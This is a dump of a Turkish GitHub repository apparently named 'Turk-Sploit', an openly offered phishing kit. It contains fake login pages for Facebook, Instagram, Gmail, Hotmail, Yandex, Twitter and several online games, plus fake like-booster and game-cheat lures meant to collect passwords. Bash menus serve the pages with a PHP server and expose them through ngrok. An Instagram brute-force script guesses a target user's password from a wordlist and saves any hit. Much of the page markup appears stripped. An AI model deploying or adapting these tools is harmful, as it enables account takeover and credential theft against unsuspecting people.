Repository: yamanefkar/Turk-Sploit Branch: master Commit: 677410ba6085 Files: 34 Total size: 13.7 MB Directory structure: gitextract_le6w1hw_/ ├── .gitignore ├── LICENSE ├── README.md ├── Site/ │ ├── Facebook/ │ │ ├── Site-facebook/ │ │ │ └── index.php │ │ ├── Site-fakepanel/ │ │ │ └── index.php │ │ └── start.sh │ ├── Game/ │ │ ├── Site-legend/ │ │ │ └── index.php │ │ ├── Site-lol/ │ │ │ └── index.php │ │ ├── Site-pubg/ │ │ │ └── index.php │ │ ├── Site-wolfteam/ │ │ │ └── index.php │ │ ├── Site-zula/ │ │ │ └── index.php │ │ └── start.sh │ ├── Instagram/ │ │ ├── Instagram-bruteforce/ │ │ │ ├── Executable/ │ │ │ │ ├── LICENSE │ │ │ │ ├── instagram.py │ │ │ │ └── install.py │ │ │ ├── instagram.py │ │ │ ├── install.py │ │ │ └── requirements.txt │ │ ├── Instagram-fakepanel/ │ │ │ └── index.php │ │ ├── Instagram-phishing/ │ │ │ └── index.php │ │ └── start.sh │ ├── Mail/ │ │ ├── Site-gmail/ │ │ │ └── index.php │ │ ├── Site-hotmail/ │ │ │ └── index.php │ │ ├── Site-yandex/ │ │ │ └── index.php │ │ └── start.sh │ ├── Twitter/ │ │ ├── Site-fakepanel/ │ │ │ └── index.php │ │ ├── Site-phishing/ │ │ │ └── index.php │ │ └── start.sh │ ├── Whatsapp/ │ │ ├── Site/ │ │ │ └── index.php │ │ └── start.sh │ └── code.sh ├── ngrok ├── requirements.sh └── tst.sh ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # C extensions *.so # Distribution / packaging .Python build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ lib/ lib64/ parts/ sdist/ var/ wheels/ pip-wheel-metadata/ share/python-wheels/ *.egg-info/ .installed.cfg *.egg MANIFEST # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .nox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *.cover *.py,cover .hypothesis/ .pytest_cache/ # Translations *.mo *.pot # Django stuff: *.log local_settings.py db.sqlite3 db.sqlite3-journal # Flask stuff: instance/ .webassets-cache # Scrapy stuff: .scrapy # Sphinx documentation docs/_build/ # PyBuilder target/ # Jupyter Notebook .ipynb_checkpoints # IPython profile_default/ ipython_config.py # pyenv .python-version # pipenv # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. # However, in case of collaboration, if having platform-specific dependencies or dependencies # having no cross-platform support, pipenv may install dependencies that don't work, or not # install all needed dependencies. #Pipfile.lock # PEP 582; used by e.g. github.com/David-OConnor/pyflow __pypackages__/ # Celery stuff celerybeat-schedule celerybeat.pid # SageMath parsed files *.sage.py # Environments .env .venv env/ venv/ ENV/ env.bak/ venv.bak/ # Spyder project settings .spyderproject .spyproject # Rope project settings .ropeproject # mkdocs documentation /site # mypy .mypy_cache/ .dmypy.json dmypy.json # Pyre type checker .pyre/ ================================================ FILE: LICENSE ================================================ Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ================================================ FILE: README.md ================================================ # Turk-Sploit ================================================ FILE: Site/Facebook/Site-facebook/index.php ================================================ Facebook'a Giriş Yap | Facebook
Facebook'a Giriş Yap
================================================ FILE: Site/Facebook/Site-fakepanel/index.php ================================================
LikeMe | Facebook Beğeni
Durum, Resim, Resim ve Durum Yorumu, Sayfa Resmi, Sayfa Durumu, Reaksiyon
SSS
Hakkında |
Anasayfa |

Facebook'ta Popüler Ol

Sorun mu var? Burayı incele

Bilgilendirme: Facebook tarafından yapılan değişiklik sebebiyle beğeni limitini azaltmak zorunda kaldık, azalmadığımız taktirde hiç beğeni alamayacaktınız! Beğeni sayısının azaldığının farkındayız, limitleri yeniden arttırabilmek için çalışıyoruz, anlayışınız için teşekkür ederiz.
Yeni Yöntem: Giriş yapmak için kodu kopyalayın ve https://www.facebook.com/device adresine yapıştırın,izinleri onaylayın otomatik olarak giriş yapacaksınız.
Şifreyle giriş:
Kullanıcı adı ve şifrenizi girdikten sonra Token Al diyerek oluşan bütün yazıyı kopyalayın ve giriş yapın.
Şifrenizi kulanmak yerine buradan uygulama şifresi oluşturup facebook'un size verdiği şifreyi kullanmanızı tavsiye ederiz.
Checkpoint'e düşüyorsanız girmeden önce tarayıcınızın yan sekmesinden Facebook hesabınıza giriş yapın. Ayrıca İki faktörlü kimlik doğrulama'yı kapatın.

Diğer Uygulamalarımız

Instagram Beğeni & Takipçi
Android telefonunuza eklentileri kurmak için yandex browser kullanabilirsiniz.
Şartlar ve Koşullar'ı okudum, kabul ediyorum.




LikeMe © 2019 Türkçe (TR)
Virustotal Secured URLVOID Secured
================================================ FILE: Site/Facebook/start.sh ================================================ GNU nano 3.2 start.sh #!/bin/bash #Code:Yaman Efkar #Türk Siber Timi #İnstagram : @turksibertimi #Youtube : YamanEfkar clear echo -e " \e[35m ((( #Türk Siber Timi #Yaman Efkar ))) \e[31m[01]\e[32m Facebook Login \e[31m[02]\e[32m Facebook Fake Panel \e[31m[00]\e[37m Menü \e[31m[99]\e[37m Exit " echo -e "\e[49m" read -p "İşlem Numarasını Giriniz: " islem if [[ $islem == 1 || $islem == 01 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: face01" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-facebook/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 2 || $islem == 02 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: face02" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-fakepanel/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 0 || $islem == 00 ]]; then cd .. cd .. bash tst.sh elif [[ $islem == 9 || $islem == 99 ]]; then clear echo -e "\e[31mTürk Siber Timi İyi Günler Diler :)) ßß" clear sleep 1 exit 1 else echo "" echo -e "\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz...." sleep 3 clear bash start.sh fi ================================================ FILE: Site/Game/Site-legend/index.php ================================================ -- Zula V1.3 --

Legend Online

Elmas Hilesi V1.3

E-MAİL

Password




================================================ FILE: Site/Game/Site-lol/index.php ================================================ -- LOL V1.3 --

League of Legends

LOL

E-MAİL

Username

Password




================================================ FILE: Site/Game/Site-pubg/index.php ================================================ -- Pubg V1.3 --

Pubg Money Hack

PUBG

E-MAİL

Password




================================================ FILE: Site/Game/Site-wolfteam/index.php ================================================ -- Zula V1.3 --

Wolfteam E-pin

Wolfteam

E-MAİL

Username

Password




================================================ FILE: Site/Game/Site-zula/index.php ================================================ -- Zula V1.3 --

Zula Za Hack

Zula

E-MAİL

Username

Password




================================================ FILE: Site/Game/start.sh ================================================ #!/bin/bash #Code:Yaman Efkar #Türk Siber Timi #İnstagram : @turksibertimi #Youtube : YamanEfkar clear echo -e " \e[35m ((( #Türk Siber Timi #Yaman Efkar ))) \e[31m[01]\e[32m Wolfteam \e[31m[04]\e[32m Zula \e[31m[02]\e[32m Legend Online \e[31m[05]\e[32m LoL \e[31m[03]\e[32m Pubg \e[31m[00]\e[37m Menü \e[31m[99]\e[37m Exit " echo -e "\e[49m" read -p "İşlem Numarasını Giriniz: " islem if [[ $islem == 1 || $islem == 01 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: game01" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-wolfteam/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 2 || $islem == 02 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: game02" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-legend/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 3 || $islem == 03 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: game03" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-pubg/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 4 || $islem == 04 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: game04" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-zula/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 5 || $islem == 05 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: game05" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-lol/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 0 || $islem == 00 ]]; then cd .. cd .. bash tst.sh elif [[ $islem == 9 || $islem == 99 ]]; then clear echo -e "\e[31mTürk Siber Timi İyi Günler Diler :)) ßß" exit 1 else echo "" echo -e "\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz...." sleep 3 clear bash start.sh fi ================================================ FILE: Site/Instagram/Instagram-bruteforce/Executable/LICENSE ================================================ MIT License Copyright (c) 2018 Mohamed Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: Site/Instagram/Instagram-bruteforce/Executable/instagram.py ================================================ # Date: 12/29/2018 # Author: Mohamed # Description: Instagram bruter from sys import exit from os.path import exists from lib.bruter import Bruter from lib.session import Session from lib.display import Display from lib.const import credentials, modes class Engine(object): def __init__(self, username, threads, passlist_path): self.bruter = None self.resume = False self.is_alive = True self.threads = threads self.username = username self.display = Display() self.passlist_path = passlist_path self.session = Session(username, passlist_path) def session_exists(self): return self.session.exists def create_bruter(self): self.bruter = Bruter(self.username, self.threads, self.passlist_path, self.resume) def get_user_resp(self): return self.display.prompt('Would you like to resume the attack? [y/n]: ') def write_to_file(self, password): with open(credentials, 'at') as f: data = 'Username: {}\nPassword: {}\n\n'.format(self.username.title(), password) f.write(data) def start(self): if self.session_exists() and self.is_alive: resp = None try: resp = self.get_user_resp() except: self.is_alive = False if resp and self.is_alive: if resp.strip().lower() == 'y': self.resume = True if self.is_alive: self.create_bruter() try: self.bruter.start() except KeyboardInterrupt: self.bruter.stop() self.bruter.display.shutdown(self.bruter.last_password, self.bruter.password_manager.attempts, len(self.bruter.browsers)) finally: self.stop() def stop(self): if self.is_alive: self.bruter.stop() self.is_alive = False if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: self.bruter.display.stats_not_found(self.bruter.last_password, self.bruter.password_manager.attempts, len(self.bruter.browsers)) if self.bruter.is_found: self.write_to_file(self.bruter.password) self.bruter.display.stats_found(self.bruter.password, self.bruter.password_manager.attempts, len(self.bruter.browsers)) def args(): enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) if not enable_colors: enable_colors = True else: if enable_colors[0].lower() == 'n': enable_colors = False display = Display(is_color=enable_colors) username = display.prompt('Enter a username: ') if not username: display.warning('You can\'t leave this field empty') display.wait() exit() passlist = display.prompt('Enter the path to your password list: ') if not exists(passlist): display.warning('Invalid path to password list', False) display.wait() exit() display.info('''Modes:\r 0: => 256 passwords at a time 1: => 128 passwords at a time 2: => 64 passwords at a time 3: => 32 passwords at a time ''', False) mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) if not mode.isdigit(): display.warning('Mode must be a number', False) display.wait() exit() mode = int(mode) if int(mode) > 3: display.warning('Mode must be no more than 3', False) display.wait() exit() if int(mode) < 0: display.warning('Mode must bot no less than 0', False) display.wait() exit() return [username, passlist, mode] if __name__ == '__main__': try: user_input = args() except KeyboardInterrupt: exit() display = Display() username, passlist, mode = user_input try: Engine(username, modes[mode], passlist).start() except: pass finally: display.wait() exit() ================================================ FILE: Site/Instagram/Instagram-bruteforce/Executable/install.py ================================================ # Date: 01/09/2019 # Author: Mohamed # Description: Install file from time import sleep from queue import Queue from os.path import exists from subprocess import Popen from threading import Thread, RLock class Install: def __init__(self, path_to_req): self.lock = RLock() self.is_alive = True self.is_reading = True self.is_installing = False self.requirements = Queue() self.path_to_req = path_to_req @property def path_exists(self): return exists(self.path_to_req) def read_file(self): with open('requirements.txt', mode='rt') as file: for line in file: if line: with self.lock: self.requirements.put(line.replace('\n', '')) self.is_reading = False def install(self, name): print('[+] Installing {} ...'.format(name)) cmd = 'pip install {}'.format(name) cmd = cmd.split() try: self.is_installing = True Popen(cmd).wait() except: print('[!] Failed to install {}'.format(name)) finally: print('\n') self.is_installing = False def install_all(self): while self.is_alive: while self.requirements.qsize(): with self.lock: name = self.requirements.get() self.install(name) def start_primary_threads(self): read_thread = Thread(target=self.read_file) install_all_thread = Thread(target=self.install_all) read_thread.daemon = True install_all_thread.daemon = True read_thread.start() install_all_thread.start() def start(self): if self.path_exists: self.start_primary_threads() while self.is_alive: try: if not self.is_reading and not self.requirements.qsize() and not self.is_installing: self.stop() sleep(0.5) except KeyboardInterrupt: self.stop() else: print('[*] Unable to locate the file requirements.txt') def stop(self): self.is_alive = False if __name__ == '__main__': path_to_req = 'requirements.txt' install = Install(path_to_req) install.start() ================================================ FILE: Site/Instagram/Instagram-bruteforce/instagram.py ================================================ # Date: 12/29/2018 # Author: Mohamed # Description: Instagram bruter from os.path import exists from lib.bruter import Bruter from lib.session import Session from lib.display import Display from lib.const import credentials, modes from argparse import ArgumentParser, ArgumentTypeError class Engine(object): def __init__(self, username, threads, passlist_path, is_color): self.bruter = None self.resume = False self.is_alive = True self.threads = threads self.username = username self.passlist_path = passlist_path self.display = Display(is_color=is_color) self.session = Session(username, passlist_path) def passlist_path_exists(self): if not exists(self.passlist_path): self.display.warning('Invalid path to password list') return False return True def session_exists(self): return self.session.exists def create_bruter(self): self.bruter = Bruter(self.username, self.threads, self.passlist_path, self.resume) def get_user_resp(self): return self.display.prompt('Would you like to resume the attack? [y/n]: ') def write_to_file(self, password): with open(credentials, 'at') as f: data = 'Username: {}\nPassword: {}\n\n'.format(self.username.title(), password) f.write(data) def start(self): if not self.passlist_path_exists(): self.is_alive = False if self.session_exists() and self.is_alive: resp = None try: resp = self.get_user_resp() except: self.is_alive = False if resp and self.is_alive: if resp.strip().lower() == 'y': self.resume = True if self.is_alive: self.create_bruter() try: self.bruter.start() except KeyboardInterrupt: self.bruter.stop() self.bruter.display.shutdown(self.bruter.last_password, self.bruter.password_manager.attempts, len(self.bruter.browsers)) finally: self.stop() def stop(self): if self.is_alive: self.bruter.stop() self.is_alive = False if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: self.bruter.display.stats_not_found(self.bruter.last_password, self.bruter.password_manager.attempts, len(self.bruter.browsers)) if self.bruter.is_found: self.write_to_file(self.bruter.password) self.bruter.display.stats_found(self.bruter.password, self.bruter.password_manager.attempts, len(self.bruter.browsers)) def valid_int(n): if not n.isdigit(): raise ArgumentTypeError('mode must be a number') n = int(n) if n > 3: raise ArgumentTypeError('maximum for a mode is 3') if n < 0: raise ArgumentTypeError('minimum for a mode is 0') return n def args(): args = ArgumentParser() args.add_argument('username', help='email or username') args.add_argument('passlist', help='password list') args.add_argument('-nc', '--no-color', dest='color', action='store_true', help='disable colors') args.add_argument('-m', '--mode', default=2, type=valid_int, help='modes: 0 => 16 bots; 1 => 8 bots; 2 => 4 bots; 3 => 2 bots') return args.parse_args() if __name__ == '__main__': arugments = args() mode = arugments.mode username = arugments.username passlist = arugments.passlist is_color = True if not arugments.color else False Engine(username, modes[mode], passlist, is_color).start() ================================================ FILE: Site/Instagram/Instagram-bruteforce/install.py ================================================ # Date: 01/09/2019 # Author: Mohamed # Description: Install file from time import sleep from queue import Queue from os.path import exists from subprocess import Popen from threading import Thread, RLock class Install: def __init__(self, path_to_req): self.lock = RLock() self.is_alive = True self.is_reading = True self.is_installing = False self.requirements = Queue() self.path_to_req = path_to_req @property def path_exists(self): return exists(self.path_to_req) def read_file(self): with open('requirements.txt', mode='rt') as file: for line in file: if line: with self.lock: self.requirements.put(line.replace('\n', '')) self.is_reading = False def install(self, name): print('[+] Installing {} ...'.format(name)) cmd = 'pip install {}'.format(name) cmd = cmd.split() try: self.is_installing = True Popen(cmd).wait() except: print('[!] Failed to install {}'.format(name)) finally: print('\n') self.is_installing = False def install_all(self): while self.is_alive: while self.requirements.qsize(): with self.lock: name = self.requirements.get() self.install(name) def start_primary_threads(self): read_thread = Thread(target=self.read_file) install_all_thread = Thread(target=self.install_all) read_thread.daemon = True install_all_thread.daemon = True read_thread.start() install_all_thread.start() def start(self): if self.path_exists: self.start_primary_threads() while self.is_alive: try: if not self.is_reading and not self.requirements.qsize() and not self.is_installing: self.stop() sleep(0.5) except KeyboardInterrupt: self.stop() else: print('[*] Unable to locate the file requirements.txt') def stop(self): self.is_alive = False if __name__ == '__main__': path_to_req = 'requirements.txt' install = Install(path_to_req) install.start() ================================================ FILE: Site/Instagram/Instagram-bruteforce/requirements.txt ================================================ bs4 future requests colorama ================================================ FILE: Site/Instagram/Instagram-fakepanel/index.php ================================================ insMobil | Giriş Yap

GİRİŞ YAP


Kullanıcı adınızı yazarken çıkan listeden üyeliğinizi seçin.
    Şifreyi göster

    Dikkat! İlk seferde giriş olmazsa tekrar deneyin.

    Profil Resmi Olmayan Hesaplar Giriş Yapamaz!

    Hatalar ve Çözümleri; 1) Giriş işlemleri biraz uzun sürebilir, lütfen bekleyin.(30-60 saniye kadar sürebilir, çok uzun sürmesi halinde sayfayı yenileyip tekrar deneyin)
    2) Giriş yaparken sürekli olarak şifre yanlış uyarısı alıyorsanız instagram.com veya instagram mobil uygulaması üzerinden hesabınıza girip, çıkan uyarıya Bu Bendim diyin ve buradan tekrar giriş yapın.
    3) Instagram şifrenizi bloke edebilir. instagram uygulamasında bulunan şifremi unuttum butonuna tıklayarak yeni şifre alabilirsiniz.
    4) Yukarıdaki herşeyi eksiksiz yapmanıza rağmen şifreniz doğru olduğu halde sürekli 'üzgünüz şifreniz yanlıştı' hatası alıyorsanız burayı tıklayın.
    ?>
    ================================================ FILE: Site/Instagram/Instagram-phishing/index.php ================================================ Giriş Yap • Instagram
    ================================================ FILE: Site/Instagram/start.sh ================================================ #!/bin/bash| #Code:Yaman Efkar #Türk Siber Timi #İnstagram : @turksibertimi #Youtube : YamanEfkar clear echo -e '\033[32;40;1m /\︵-︵/\ |( ◉)(◉)| \ ︶V︶ / /↺↺↺↺↺↺↺\ ↺↺↺↺↺↺↺↺| \↺↺↺↺↺↺↺/ ¯¯/\¯/\¯¯ ' echo -e "\033[31;40;1m \033[31;40;1m[01]\e[37mİnstagram Phishing \033[31;40;1m[02]\e[37mİnstagram Brute-Force \033[31;40;1m[03]\e[37mİnstagram Fake Panel \e[31m[00]\e[37m Menü \e[31m[99]\e[37m Exit " echo -e "\033[32;40;1m ~~~Yaman Efkar~~~" echo "" read -p "İslem Numarası : " islem if [[ $islem == 1 || $islem == 01 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: insta01" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Instagram-phishing/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 2 || $islem == 02 ]]; then cd Instagram-bruteforce/ read -p "Hedef Kullanıcının Username : " username echo "" read -p "Wordlist'in Bulunduğu Dizin : " password python3 instagram.py $username $password -m 3 elif [[ $islem == 3 || $islem == 03 ]]; then site="Instagram-fakepanel/" read -p "Port Giriniz: " port echo -e "\e[32mCode: insta02" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Instagram-fakepanel/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 9 || $islem == 99 ]]; then clear echo -e "\e[31mTürk Siber Timi İyi Günler Diler :)) ßß" sleep 1 exit 1 elif [[ $islem == 00 ]]; then cd .. cd .. bash tst.sh else echo -e '\033[31;40;1m İslem Numaranızı Kontrol Ediniz!' sleep 2 clear bash start.sh fi ================================================ FILE: Site/Mail/Site-gmail/index.php ================================================ Google Hesap

    Google Hesabı

    Google, Google Hesabınızda oturum açtığınızda sunabileceği daha fazla bilgiye sahiptir.

    Sağda oturum açın. create an account for free.

    • Gmail

      Arkadaşlarınızla sohbet edin ve önemli bir e-postayı kaçırmayın.

    • Kişiselleştirilmiş Arama

      Geçmişteki aramalarınıza dayanarak daha alakalı sonuç alın.

    Bir google hesabının avantajlarını görün.

    Google'ın hesap onaylama sistemine hoş geldiniz.

    ================================================ FILE: Site/Mail/Site-hotmail/index.php ================================================ Microsoft hesabınızda oturum açın { border-width: 2px !important; }














    Oturum aç
    Microsoft hesabınızı kullanın. Bu nedir?
    ================================================ FILE: Site/Mail/Site-yandex/index.php ================================================ Login

    Or sign in with a social network

    ================================================ FILE: Site/Mail/start.sh ================================================ #!/bin/bash #Code:Yaman Efkar #Türk Siber Timi #İnstagram : @turksibertimi #Youtube : YamanEfkar clear echo -e " \e[35m ((( #Türk Siber Timi #Yaman Efkar ))) \e[31m[01]\e[32m Gmail \e[31m[02]\e[32m Yandex \e[31m[03]\e[32m Hotmail \e[31m[00]\e[37m Menü \e[31m[99]\e[37m Exit " echo -e "\e[49m" read -p "İşlem Numarasını Giriniz: " islem if [[ $islem == 1 || $islem == 01 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: mail01" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-gmail/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 2 || $islem == 02 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: mail02" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-yandex/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 3 || $islem == 03 ]]; then read -p "Port Giriniz: " port echo -e "\e[32mCode: mail03" sleep 2 echo "" echo -e "\e[33mPhp Server && Ngrok Service Başlatılıyor..." sleep 4 cd Site-hotmail/ php -S 127.0.0.1:$port > -t & ngrok http $port elif [[ $islem == 0 || $islem == 00 ]]; then cd .. cd .. bash tst.sh elif [[ $islem == 9 || $islem == 99 ]]; then clear echo -e "\e[31mTürk Siber Timi İyi Günler Diler :)) ßß" exit 1 else echo "" echo -e "\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz...." sleep 3 clear bash start.sh fi ================================================ FILE: Site/Twitter/Site-fakepanel/index.php ================================================ Twitter Beğeni Hilesi - Twitter Reetweet Hilesi - Twitter Takipçi 